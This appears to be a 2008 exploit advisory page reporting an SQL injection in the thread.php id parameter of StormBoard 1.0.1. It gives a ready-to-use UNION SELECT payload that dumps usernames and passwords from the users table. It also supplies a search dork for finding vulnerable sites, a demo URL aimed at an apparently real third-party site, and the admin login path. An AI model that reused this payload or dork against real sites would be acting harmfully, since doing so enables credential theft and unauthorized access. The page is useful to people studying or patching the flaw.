StormBoard 1.0.1 (thread.php id) SQL Injection Vulnerability

2008.12.30
Credit: Samir-M
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

============================================================================== _________________________________{Ù�ØØÙ�Ù� ØÙ�Ù� Ù�Ù�Ù� Ù�ØÙ�د رسÙ�Ù� Ù�Ù�Ù�}_________________________________ ---------------------------------(Samir-M)---------------------------------- StormBoard Version 1.0.1 (thread.php id=) SQL Injection Vulnerability by : Samir-M Msn : Km7@Hotmail.De from: Morocco ---------------------------------------------------------------------------- darck : "Powered by : StormBoard Version 1.0.1" ---------------------------------------------------------------------------- Exploit: site.com/thread.php?id=-null union select 1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users Dome: al-andalos.com/thread.php?id=-null+union+all+select+1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users-- Login: site.com/admin ---------------------------------------------------------------------------- Samir-M > A-flow > Gess-Inject0r > Wassim-Net ---------------------------------------------------------------------------- _______________________________________________________________________________ ===============================================================================

References:

http://www.securityfocus.com/bid/32993
http://www.milw0rm.com/exploits/7565


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top